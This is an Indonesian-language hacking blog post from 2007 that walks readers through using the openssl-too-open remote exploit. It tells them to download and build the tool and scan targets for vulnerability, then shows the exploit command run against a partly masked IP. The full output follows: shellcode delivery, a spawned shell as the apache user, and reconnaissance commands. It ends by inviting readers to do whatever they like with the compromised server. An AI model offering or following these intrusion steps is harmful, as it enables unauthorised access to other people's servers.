.:My Black Corner:.
Monday, February 19, 2007
Hacking Open SSL
Langkah yang harus dilakukan:
1. Download openssl-too-open.tar.gz bisa download dimana aja terserah...
2. Extract File tersebut.
3. Kemudian jalankan configure, make dan Siap digunakan.
Terlebih dahulu yg harus ente lakukan adalah scanning server target apakah vulnerable? Kalau vulnerable kemungkinan bisa di bobol ok.
Di bawah ini hasil server yg telah di bobol
$ ./ssl -a 0x08 -v 2xx.xx.xx.xx
: openssl-too-open : OpenSSL remote exploit
Modified by xxx
: Opening 30 connections
Establishing SSL connections
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0x8324180
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0x8324180
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0x8324180
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0x8324180 start_addr: 0x83240c0 SHELLCODE_OFS:
208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.04$
bash-2.04$ uname -a; id; w;
Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
12:01am up 10 days, 8:00, 0 users, load average: 0.24, 0.22, 0.18
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.04$
bash-2.04$
Setelah dapet terserah ente mau diapain :p
Source: Dari orang katro plus ndeso yang berasal dari clan yang berbahaya kalo disebutkan namanya (bisa2 blog gw di deface). Sorry gw gak sebut asal usul ente bro..! But ur still in my heart... (cuiiih).
0 Comments:
Post a Comment
<< Home